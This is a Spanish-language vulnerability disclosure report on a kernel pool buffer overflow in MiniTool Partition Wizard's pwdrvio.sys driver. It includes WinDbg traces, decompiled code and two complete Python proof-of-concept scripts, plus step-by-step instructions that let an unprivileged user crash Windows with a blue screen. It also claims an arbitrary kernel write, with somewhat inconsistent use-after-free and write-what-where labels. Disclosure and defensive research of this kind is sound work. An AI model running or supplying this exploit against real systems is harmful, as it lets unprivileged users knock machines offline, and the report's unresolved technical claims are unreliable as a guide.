
Fecha del proyecto: Feb 2026 / Se descubrió una vulnerabilidad de desbordamiento de búfer en el manejador IOCTL del controlador del kernel. La vulnerabilidad permite a un atacante local sin privilegios corromper la memoria del kernel pool, provocando un bloqueo inmediato del sistema (BSOD) y una denegación de servicio.
Fecha del proyecto: feb 2026 / Se descubrió una vulnerabilidad de desbordamiento de búfer en el manejador de IOCTL del controlador de kernel pwdrvio.sys. La vulnerabilidad permite que un atacante local sin privilegios corrompa la memoria del pool del kernel, provocando un bloqueo inmediato del sistema (BSOD) y una denegación de servicio.
https://github.com/user-attachments/assets/b53fb5d1-b4d0-4bc6-ad6e-2a321a1d2101
Denegación de servicio (DoS)
Gravedad: MEDIA
Puntuación CVSS 3.1: 5.5 (DoS)
Cadena de vector CVSS:
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:HDesbordamiento de búfer — Denegación de servicio (CVSS 5.5 - MEDIA)
Requisitos previos del ataque:
Resultados de la explotación: DoS - Caída inmediata del sistema, indisponibilidad del servicio
Fecha: 5 de febrero de 2026
Actividad: Fuzzing sistemático del controlador de kernel mediante un fuzzer de Python personalizado
Proceso de descubrimiento:
Selección del objetivo:
pwdrvio.sys como el controlador más antiguo (marca de tiempo: 16 de junio de 2009)C:\Windows\System32\drivers\pwdrvio.sys\\.\PartitionWizardDiskAccesser\0Fuzzing inicial:
ctypes para interactuar con el controladorWriteFile/DeviceIoControl al dispositivo del controladorActivación del Verificador:
verifier /standard /driver pwdrvio.sys
Configuración del Verificador:
Verifier Flags: 0x001209bb
Standard Flags Enabled:
[X] Special pool
[X] Force IRQL checking
[X] Pool tracking
[X] I/O verification
[X] Deadlock detection
[X] DMA checking
[X] Security checks
[X] Miscellaneous checks
[X] DDI compliance checking
Fecha: 5-6 de febrero de 2026
Actividad: Se estableció un entorno de depuración de kernel para el análisis de causa raíz
Procedimiento de configuración:
Configuración del puerto serie de VMware:
VMware Workstation Pro → VM Settings
├─ Add Hardware → Serial Port
├─ Connection: "Use named pipe"
├─ Path: \\.\pipe\com_1
├─ End: "This is the server"
└─ I/O Mode: "Yield CPU on poll" ✓
Configuración del SO invitado:
REM Administrator Command Prompt
bcdedit /debug on
bcdedit /dbgsettings serial debugport:1 baudrate:115200
shutdown /r /t 0
Conexión del WinDbg anfitrión:
WinDbg → File → Attach to Kernel
├─ Port: \\.\pipe\com_1
├─ Baud Rate: 115200
├─ Pipe: ✓
└─ Reconnect: ✓
Result: "Kernel Debugger connection established."
Fecha: 6 de febrero de 2026
Actividad: Se identificó una primitiva de escritura arbitraria en el kernel
Pasos del análisis:
Análisis del módulo:
1: kd> lm m pwdrvio
start end module name
fffff805`315f0000 fffff805`315f8000 pwdrvio (Jun 16 2009)
1: kd> !drvobj pwdrvio 2
Driver object (fffff805`XXXXXXXX) is for:
\Driver\pwdrvio
DriverEntry: fffff805`315f6008
DriverUnload: fffff805`315f1060
Dispatch Routines:
[00] IRP_MJ_CREATE fffff805`315f108c
[02] IRP_MJ_CLOSE fffff805`315f12f8
[03] IRP_MJ_READ fffff805`315f16c4
[04] IRP_MJ_WRITE fffff805`315f1564 ← Target
[0e] IRP_MJ_DEVICE_CONTROL fffff805`315f1404
Descubrimiento de la instrucción vulnerable:
Establecer un punto de interrupción en el controlador de escritura:
1: kd> bp pwdrvio+0x1641
1: kd> g
Breakpoint 0 hit
pwdrvio+0x1641:
fffff805`315f1641 498943f0 mov qword ptr [r11-10h],rax
Hallazgo crítico: ¡Primitiva de escritura arbitraria identificada!
RAX) en la dirección [R11-0x10]R11 se carga desde el marco de pila: mov r11, qword ptr [rbp+0xB8h]Fecha: 6-7 de febrero de 2026
Actividad: Se rastreó la vulnerabilidad desde User-After-Free hasta una condición de write-what-where
Cadena de corrupción de memoria:
Asignación de IRP:
0: kd> !pool @rbp
Pool page ffffe60f84c38610 region is Special pool
*ffffe60f84c38000 size: 1f0 data: ffffe60f84c38e10 (NonPaged) *Irp+
Pooltag Irp+ : I/O verifier allocated IRP packets
Relación de búferes:
0: kd> r rsi
rsi=ffffe60f828df900 ← User buffer location
0: kd> ? @rbp - @rsi
Evaluate expression: 35823344 = 00000000`02229ef0 ← 35MB difference!
Análisis: El búfer de usuario NO es directamente accesible desde el marco RBP
RBP+0xB8 no apunta al búfer controlado por el usuarioCondición de Use-After-Free:
El controlador mantiene punteros colgantes en la estructura IRP:
// Ghidra decompilation (pwdrvio+0x1564)
longlong lVar1 = *(longlong *)(param_2 + 0xb8); // Load from IRP
// No validation!
lVar5 = IoBuildAsynchronousFsdRequest(...);
// Write to [lVar1 - 0x10]
*(code **)(lVar3 + -0x10) = FUN_00011364; // Arbitrary write!
Fecha: 8 de febrero de 2026
Actividad: Se descubrió una vulnerabilidad de DoS independiente
Descubrimiento:
Fuzzing de IOCTL:
0x22000d como vulnerableMecanismo de caída:
# Vulnerable parameters
TARGET_IOCTL = 0x22000d
input_buf = (ctypes.c_char * 1024)(*([0xFF] * 1024))
real_output_buffer = ctypes.create_string_buffer(4)
fake_output_length = 8192 # Driver trusts this value!
DeviceIoControl(handle, TARGET_IOCTL, input_buf, 1024,
real_output_buffer, fake_output_length, ...)
Comportamiento del controlador:
Salida del Verificador:
DRIVER_VERIFIER_DETECTED_VIOLATION (c4)
Arg1: 0000000000000091, Corrupted pool allocation
Arg2: fffff805315f1404, Driver code address
Arg3: ffffe60f84c38000, Pool allocation address
Arg4: 0000000000000091, Corruption type
PROCESS_NAME: python.exe
Ubicación: manejador de IOCTL de pwdrvio.sys
IOCTL vulnerable: 0x22000d
Mecanismo de activación:
import ctypes
from ctypes import wintypes
DEVICE_NAME = r"\\.\PartitionWizardDiskAccesser\0"
TARGET_IOCTL = 0x22000d
kernel32 = ctypes.windll.kernel32
# Open driver
handle = kernel32.CreateFileW(DEVICE_NAME, 0xC0000000, 3, None, 3, 0, None)
# Malicious parameters
input_buf = (ctypes.c_char * 1024)(*([0xFF] * 1024))
real_output_buffer = ctypes.create_string_buffer(4) # Only 4 bytes!
fake_output_length = 8192 # Claim 8192 bytes!
bytes_returned = wintypes.DWORD(0)
# Trigger overflow
kernel32.DeviceIoControl(handle, TARGET_IOCTL,
input_buf, 1024,
real_output_buffer, fake_output_length, # ← Overflow!
ctypes.byref(bytes_returned), None)
Comportamiento de la caída:
Con el Verificador de controladores habilitado:
DRIVER_VERIFIER_DETECTED_VIOLATION (c4)
Arguments:
Arg1: 0000000000000091 - Corrupted pool allocation detected
Arg2: fffff805315f1404 - Driver code address (IOCTL handler)
Arg3: ffffe60f84c38000 - Pool allocation address
Arg4: 0000000000000091 - Special pool pattern corrupted
Analysis:
- Driver attempts to write 8192 bytes to 4-byte buffer
- Pool header corruption detected by verifier
- Immediate bugcheck (BSOD)
Process triggering crash: python.exe (standard user)
Sin el Verificador de controladores:
SYSTEM_SERVICE_EXCEPTION (3b)
Arguments:
Arg1: 00000000c0000005 - Access violation
Arg2: fffff805315f1404 - Faulting address in pwdrvio.sys
Arg3: ffffXXXXXXXXXXXX - Trap frame
Arg4: 0000000000000000
Result: Blue Screen of Death
Código:
import ctypes
from ctypes import wintypes
# --- Settings ---
DEVICE_NAME = r"\\.\PartitionWizardDiskAccesser\0"
kernel32 = ctypes.windll.kernel32
# --- Defines ---
# Windows API Defines
kernel32.CreateFileW.argtypes = [wintypes.LPCWSTR, wintypes.DWORD, wintypes.DWORD,
wintypes.LPVOID, wintypes.DWORD, wintypes.DWORD, wintypes.HANDLE]
kernel32.CreateFileW.restype = wintypes.HANDLE
kernel32.DeviceIoControl.argtypes = [wintypes.HANDLE, wintypes.DWORD, wintypes.LPVOID, wintypes.DWORD,
wintypes.LPVOID, wintypes.DWORD, ctypes.POINTER(wintypes.DWORD), wintypes.LPVOID]
kernel32.DeviceIoControl.restype = wintypes.BOOL
def trigger_bsod():
print("[!] MiniTool DoS...")
# 1. Connect Driver
handle = kernel32.CreateFileW(DEVICE_NAME, 0xC0000000, 3, None, 3, 0, None)
if handle == wintypes.HANDLE(-1).value or handle is None:
print("[-] Couldnt Connect.")
return
# 2. Preperation
# IOCTL from Fuzzer
TARGET_IOCTL = 0x22000d
# Input: Fiiled 0xFF - 1024 byte (Pointer Poisoning)
in_size = 1024
input_buf = (ctypes.c_char * in_size)(*([0xFF] * in_size))
# Output Trap: Standard 4 byte, 8192 byte in Driver
real_output_buffer = ctypes.create_string_buffer(4)
fake_output_length = 8192
bytes_returned = wintypes.DWORD(0)
print("[+] Wait for BSoD...")
# 3. Loop (Pool Corruption)
while True:
kernel32.DeviceIoControl(
handle,
TARGET_IOCTL,
input_buf,
in_size,
real_output_buffer,
fake_output_length, # <--- Vulnerable Point: Driver BufferOverflow
ctypes.byref(bytes_returned),
None
)
if __name__ == "__main__":
trigger_bsod()
Explotación:
PS C:\Users\standarduser\directory> & "C:\Program Files\Python314\python.exe" .\DoS_PoC.py
Entorno de prueba:
Herramientas requeridas:
Paso 1: Verificar la instalación del controlador
C:\> sc query pwdrvio
SERVICE_NAME: pwdrvio
TYPE : 1 KERNEL_DRIVER
STATE : 4 RUNNING
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
Paso 2: Habilitar el Verificador de controladores (opcional pero recomendado)
REM Administrator Command Prompt
C:\> verifier /standard /driver pwdrvio.sys
REM Verify configuration
C:\> verifier /query
Verifier Flags: 0x001209bb
Standard Flags:
[X] 0x00000001 Special pool
[X] 0x00000002 Force IRQL checking
[X] 0x00000008 Pool tracking
[X] 0x00000010 I/O verification
[X] 0x00000020 Deadlock detection
[X] 0x00000080 DMA checking
[X] 0x00000100 Security checks
[X] 0x00000800 Miscellaneous checks
[X] 0x00020000 DDI compliance checking
Driver Verification List:
MODULE: pwdrvio.sys (load: 1 / unload: 0)
REM Reboot for verifier to take effect
C:\> shutdown /r /t 0
Paso 3: Crear el script de explotación DoS
Guárdelo como dos_exploit.py:
import ctypes
from ctypes import wintypes
# Device path
DEVICE_NAME = r"\\.\PartitionWizardDiskAccesser\0"
kernel32 = ctypes.windll.kernel32
# Windows API definitions
kernel32.CreateFileW.argtypes = [wintypes.LPCWSTR, wintypes.DWORD, wintypes.DWORD,
wintypes.LPVOID, wintypes.DWORD, wintypes.DWORD,
wintypes.HANDLE]
kernel32.CreateFileW.restype = wintypes.HANDLE
kernel32.DeviceIoControl.argtypes = [wintypes.HANDLE, wintypes.DWORD, wintypes.LPVOID,
wintypes.DWORD, wintypes.LPVOID, wintypes.DWORD,
ctypes.POINTER(wintypes.DWORD), wintypes.LPVOID]
kernel32.DeviceIoControl.restype = wintypes.BOOL
def trigger_bsod():
print("[*] MiniTool pwdrvio.sys DoS Exploit")
print("[*] Triggering Blue Screen of Death...")
# Open device
handle = kernel32.CreateFileW(DEVICE_NAME, 0xC0000000, 3, None, 3, 0, None)
if handle == wintypes.HANDLE(-1).value or handle is None:
print("[-] Failed to open driver")
print("[-] Ensure MiniTool Partition Wizard is installed")
return
print("[+] Driver opened successfully")
# Vulnerable IOCTL code
TARGET_IOCTL = 0x22000d
# Input buffer: 1024 bytes of 0xFF
input_buf = (ctypes.c_char * 1024)(*([0xFF] * 1024))
# Output buffer: Only 4 bytes (but claim 8192!)
real_output_buffer = ctypes.create_string_buffer(4)
fake_output_length = 8192 # Driver trusts this value → Overflow!
bytes_returned = wintypes.DWORD(0)
print("[!] Sending malicious IOCTL...")
print("[!] System will crash in 3...2...1...")
# Trigger buffer overflow → BSOD
kernel32.DeviceIoControl(
handle,
TARGET_IOCTL,
input_buf,
1024,
real_output_buffer,
fake_output_length, # ← Vulnerability trigger
ctypes.byref(bytes_returned),
None
)
# This line will never execute
print("[*] If you see this, the exploit failed")
if __name__ == "__main__":
trigger_bsod()
Paso 4: Ejecutar la explotación (usuario estándar)
C:\> whoami
desktop-lfkkhu2\standard_user
C:\> python dos_exploit.py
[*] MiniTool pwdrvio.sys DoS Exploit
[*] Triggering Blue Screen of Death...
[+] Driver opened successfully
[!] Sending malicious IOCTL...
[!] System will crash in 3...2...1...
[System immediately crashes with BSOD]
Resultado esperado:
Pantalla azul con código de detención:
DRIVER_VERIFIER_DETECTED_VIOLATION (c4)
o
SYSTEM_SERVICE_EXCEPTION (3b)
Verificación: La caída del sistema confirma la vulnerabilidad de DoS
Software de MiniTool:
Product: MiniTool Partition Wizard
Version: 13.5
Installation Path: C:\Program Files\MiniTool Partition Wizard
Driver Path: C:\Windows\System32\drivers\pwdrvio.sys
Driver Date: June 16, 2009 (0x4A36F8D1)
Driver Size: 32,256 bytes
Herramientas de prueba:
WinDbg Version: 10.0.29507.1001 AMD64
Python Version: 3.x with ctypes
Compiler: x86_64-w64-mingw32-gcc (MinGW)
Verifier: Windows Driver Verifier (Standard flags)
Producto principal:
Detalles del controlador:
File Name: pwdrvio.sys
File Version: [Not available]
File Size: 32,256 bytes (31.5 KB)
Time Stamp: 0x4A36F8D1 (June 16, 2009, 04:43:45 UTC)
Digital Signature: [Signed by vendor]
Device Name: \\.\PartitionWizardDiskAccesser\0
Service Name: pwdrvio
Load Order: Boot Start (SERVICE_BOOT_START)
Otros productos de MiniTool que pueden usar el mismo controlador:
Nota: Cada producto debe probarse individualmente para confirmarlo.
Probado y confirmado como vulnerable:
Probablemente vulnerable (no probado):
Motivo: El controlador es compatible con todas las versiones modernas de Windows y no contiene comprobaciones específicas de versión.
Este repositorio se proporciona estrictamente con fines educativos, de investigación de seguridad defensiva y de reproducción de vulnerabilidades en entornos de laboratorio controlados. La información y el código de prueba de concepto están destinados a ayudar a defensores, investigadores y proveedores a comprender y remediar la vulnerabilidad reportada. El uso no autorizado o malintencionado de este código contra sistemas sin permiso explícito puede violar las leyes y regulaciones aplicables. El autor no promueve ni tolera actividades ilegales y no asume ninguna responsabilidad por el mal uso o los daños causados por este material.
Este informe de divulgación de vulnerabilidad se proporciona para:
Usos prohibidos:
El investigador realizó todas las pruebas en sistemas de su propiedad en entornos controlados. No se realizó ningún acceso no autorizado a sistemas de terceros.
Versión del informe: 1.0
Última actualización: 9 de febrero de 2026
Análisis del estado de los registros:
0: kd> r
rax=fffff805315f1364 ← Kernel code pointer
r11=ffffe60f84c38750 ← Destination address (controlled via stack)
rbp=ffffe60f84c38610 ← IRP stack frame
0: kd> dq @rbp+0xB8 L1
ffffe60f`84c386c8 ffffe60f`84c38750 ← R11 loaded from here